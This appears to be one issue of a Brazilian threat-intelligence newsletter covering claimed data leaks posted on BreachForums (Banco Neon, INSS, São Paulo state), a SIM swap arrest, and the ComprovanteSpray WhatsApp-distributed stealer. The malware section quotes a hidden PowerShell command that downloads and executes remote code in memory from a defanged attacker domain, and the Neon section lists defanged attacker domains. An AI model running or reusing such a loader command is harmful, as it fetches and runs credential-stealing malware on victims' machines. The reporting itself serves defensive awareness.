ABT - Issue 2025-02-19

Brazilians on BreachForums are on fire | ComprovanteSpray Malware | SIM Swap scheme dismantled by Brasilia DF Police

This edition of Advanced Brazilian Threat covers two weeks since last issue, 2025-02-05. Analysis cut-off date is February 16, 2025.

BreachForums: Data Leak of Brazilian neobank Banco Neon

Between February 11 and 12, banconeon (BreachForums) published a post on the forum disclosing a data leak involving 30 million Banco Neon customers. According to the attacker, the data extracted was Full Name, CPF (citizen unique ID and tax ID), Telephone, email address and mother's name. The information was obtained from TecMundo.

Screenshot of post “How much is 30 million data from a Brazilian bank work?” by Tecmundo, including sanitization.

On February 12, the attacker, who had identified himself as banconeon on BreachForums, contacted a TecMundo journalist using a new name: Pegasus. The post on BreachForums, which is now no longer available, served only to give the incident the desired visibility among individuals and threat intelligence companies that closely follow each post and user as if they were a football match. Interviews with ransomware operators and major data leaks are nothing new, and the interview to TecMundo (Portuguese) was not exactly a surprise. Below are the key points from the interview that caught my attention:

• Motivation: dissatisfaction with the lack of financial recognition for finding bugs. I have heard of similar reports, which stated that bug bounty programs (rewards for software bugs) from Brazilian brokers and companies were not rewarding enough.

• How the data was obtained: unclear. The answer to this question was “I never worked there (Banco Neon). It was a domain name error, which, by the way, exists in almost all .br websites. It is a question of identity. […] The problem is .gov, but there are other ways without it too.”

• Pegasus claims that he / she approached Banco Neon and negotiated its silence for 5 Bitcoins (BTC) - approximately R$2.8 million (BRL). According to the attacker, the bank agreed to make the payment. TecMundo investigated this allegation and claims it to be true.

• Pegasus appears to have a certain work ethic, revealing that he would only disclose the data to the bank and the affected customer. The actor claims to have sent 7,000 SMS messages with the text “[NAME], seus dados foram vazados pelo Neon! Acesse com urgência: URL”, however, it was not possible to confirm this information.

  • In the BF post, the video that would be proof of the claim was in hXXps://neonsefudeu[.]com/

• Pegasus claimed to TecMundo that it was setting up a kind of Have I Been Pwned (HIBP) for victims to check for compromise directly. This is interesting, perhaps it will become a trend - a kind of HIBP without intermediaries. The site seems to be one of these:

  • neonvazou[.]com

  • vazouneon[.]com

  • neonvazados[.]com

  • vazamentosneon[.]com

  • vazamentosdoneon[.]com

  • neononline[.]link

  • vazamentoneon[.]link

• Pegasus provided the following email address pegasus@pegasus.monster .

There is the point of view from each person involved and what actually happened. We may never know the full extent of this incident, whether the data obtained went beyond those five columns, whether the attacker obtained transactional data or, worse, the possibility of transferring funds.

Banco Neon appears to have carried out a risk analysis taking into account the impact on its public image, the impact on its business and the consequences before the National Data Protection Authority (ANPD, which oversees the LGPD the local GDPR) and decided that it would be worth not paying the compulsory bug bounty. Many companies have policies for this type of incident, which is similar to Ransomware. Pay or not pay the ransom, activate insurance if applicable, face the consequences head on.

Below, I reproduce the official statement sent to the bank's customers (translated).

Dear Customer,

On February 9, 2025, Neon became aware of a possible improper copy of its customers' personal data and immediately began investigations to confirm its occurrence and assess its extent.

Therefore, valuing responsibility and transparency, Neon informs that it identified access and copying of your following personal data: name, CPF, telephone, email, father's name and mother's name. These are registration data that are classified as simple (general) under the applicable legislation.

Neon verified that the access and copy occurred through the exploitation of an internal system credential assigned to a partner, with the use of advanced techniques. Neon has activated security protocols and adopted the necessary measures to prevent new unauthorized accesses and is constantly monitoring the networks, and, to date, has not identified the public disclosure of the impacted personal data.

It is important to highlight that your financial data was not accessed and that the events that occurred do not allow access to your bank accounts or make it possible to carry out transactions.

Our team continues to investigate the incident and is adopting all necessary measures to ensure the protection of your personal data. We will remain vigilant and monitor the situation closely.

We reiterate that your account remains secure: no action is required in relation to your account.

We warn you to be alert to possible suspicious communications, especially those that require access to links, downloading files or requesting any urgent action.

Should you have any questions, we are available to assist you through the official channel, available in our application.

Sincerely,
Neon Team.

BreachForums again and again

BreachForums is being frequently used as a platform for disclosing breaches in the context of Brazil. In most of the times, the user which publishes the post has a freshly created account and not many other posts - if any. Also, most of the times the posts are deleted after they get media attention in Brazil - usually TecMundo.

Instituto Nacional do Seguro Social (INSS)

On February 5, 2025, TecMundo reported a possible data leak involving 39 million users of Cadastrar Comunicação de Acidente de Trabalho (CAT) system, from INSS. The news replicated a Data Breach Alert by Hackmanac / H4ckManac (X). INSS is the Brazilian government organization for social security, responsible for the public retirement pensions, so this could potentially affect the majority of adult citizens.

Source: https://x.com/H4ckManac/status/1887120995603169423

According to the BreachForum post, the user known as Sorb (BreachForums), who is still active, claims that the breach occurred on January 30 and that it was made possible by the exploitation of an undisclosed vulnerability. According to Sorb, 88 GB of data was exfiltrated, which included personal data such as full name, gender, date of birth, social security number, phone number, email address, among others.

The profile @H4ckManac (X) warns that the leak has not been confirmed or denied.

The confirmation or denial of these claims has yet to be verified.

One of the most important tasks when reporting a claim like this is to try to obtain a proof of claim, either passively (OSINT) or actively by engagement. Without proof or public confirmation from the victim, it is just a claim, no matter how good the reputation of the attacker is. Proving the allegation is important in both breach and ransomware incidents.

I know it's tempting to get a scoop on a leaked Social Security system, but any content from BreachForums or similar forums should be treated with great caution. In this case, the original post was deleted - The specified thread does not exist - which says something about the veracity or validity of the claim. Just like in cases of cancellations, no one remembers to update the story with new facts.

Data of citizens of São Paulo state

On February 14, hacker UndefinedBrazil (BreachForums) announced that he / she had extracted almost 71 million photos and 45 million citizen records from a São Paulo state government system. This was the only post by this user, who joined the forum in December 2024. He included samples to prove his claims. TecMundo reported the event on the same day, with good fact-checking and even engagement (direct contact) with UndefinedBrazil. Well done, TecMundo.

Post “Vazamento de 71 milhões de fotos de brasileiros” no BreachForums. February 14, 2025.

UndefinedBrazil claimed that he tried to report the issue directly to the São Paulo government for two months, without success. It's not hard to believe that part, but there are fifty shades of places to post this type of content - the individual chose one of the closest to black. Typically, hackers provide proof of compromise, but not proof of attempted contact. Let's take his word for it. All we know is that UndefinedBrazil was reprimanded by moderator Tanaka for posting the content in Portuguese on an English-language forum and for posting the content in the inappropriate section.

ComprovanteSpray Malware

Heimdall by ISH Tecnologia released sometime between the week of 01/27/2025 and 02/03/2025 - the posts or reports have no date and there is no recent content on @heimdallish (X) - information about a malware that the company named ComprovanteSpray. The research is available on the security bulletins page or directly in the report (PDF). The report was the subject of articles on CanalTech and TecMundo.

ComprovanteSpray is distributed via WhatsApp, runs fileless and focuses on credential theft (stealer). The final file that the messages bring is of the LNK type, a shortcut to local files that in this case execute a PowerShell script.

powershell.exe -w hid -noni -ep Bypass -c "Start-Job -Name BLEYZ -ScriptBlock { IEX (iwr -Uri 'https[:]//usmobm.animaliaoqisso[.]com/efmnejqldzbll' UseBasicParsing).Content }; Start-Sleep 146"

According to Heimdall, “at the end of the execution, it was identified that the script downloads and dynamically executes the code directly in memory, without writing it to disk. One of the techniques observed was the use of code in .NET assembly, a common approach to avoid detection by security solutions”.

Although the malware was observed being distributed via WhatsApp, there is no information in the report indicating that the threat also affects cell phones. The report suggests that the affected WhatsApp clients are WhatsApp Windows or WhatsApp Web.

Heimdall provided Indicators of Compromise (IOC) with hash, URL and domain names, but in a format that is not very convenient for those who consume the research and are not customers of the company: at the end of the PDF report. I suggest creating a Github with files related to each security bulletin.

PCDF dismantles criminal organization specialized in SIM Swap

On February 12, the Civil Police of the Federal District (PCDF) launched an operation that resulted in the arrest of three members of a criminal organization specialized in SIM Swap. The investigation, which began in January 2024, was looking into a scheme that consisted of exchanging the ownership of victims' telephone lines and then accessing bank accounts to carry out fraudulent transactions.

The group was made up of four individuals with well-defined roles:

1. a 26-year-old man, identified as the leader of the group and responsible for the operational side of the fraud;

2. his 25-year-old partner, who helped with logistics and financial transactions;

3. a 39-year-old man, responsible for changing the ownership of the telephone lines;

4. a 44-year-old man, who provided the victims' registration details. The latter is currently on the run.
   
   Found mistakes or just would like to report something for the next edition? Reach out to me over Substack or @ronaldotcom at Blue Sky.